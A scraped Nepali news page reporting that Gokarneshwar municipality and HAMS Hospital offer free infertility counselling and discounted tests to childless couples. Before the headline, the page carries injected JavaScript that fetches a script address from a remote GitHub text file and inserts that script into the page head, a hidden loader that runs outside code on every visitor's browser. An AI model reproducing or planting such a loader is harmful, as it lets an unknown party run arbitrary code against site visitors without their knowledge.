;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); निःसन्तान दम्पतीको लागि निःशुल्क परामर्श तथा उपचार हुँदै – जुनेली न्युज
बुधबार, असार १२, २०८२
  • होमपेज
  • निःसन्तान दम्पतीको लागि निःशुल्क परामर्श तथा उपचार हुँदै
Breaking News

निःसन्तान दम्पतीको लागि निःशुल्क परामर्श तथा उपचार हुँदै

जुनेली न्यूज, काठमाडौं।

निःसन्तान गोकर्णेश्वर नगरवासीहरुका नगरपालिका

गोकर्णेश्वर नगरपालिकाको विशेष अनुरोधमा HAMS हस्पिटलका विशेषज्ञ डाक्टरहरुद्वारा निःसन्तान दाम्पतीहरुलाई निशुल्क परामर्श सेवाको दिने भएको छ। प्रयोगशाला परीक्षणमा २०% छुट तथा पाठेघर जाँचमा ५०% छुट व्यवस्था हुने भएको हो।

समस्यामा परेका दम्पतीहरुले सेवा लिनुहुनको लागि गोकर्णेश्वर नगरपालिका मेयर दिपक रिसालले अनुरोध गरेका छन्।

परीक्षण मिति यही माघ १३ गते १० बजे देखि HAMS हस्पिटलमा हुनेछ।

फेसबुक प्रतिक्रियाहरु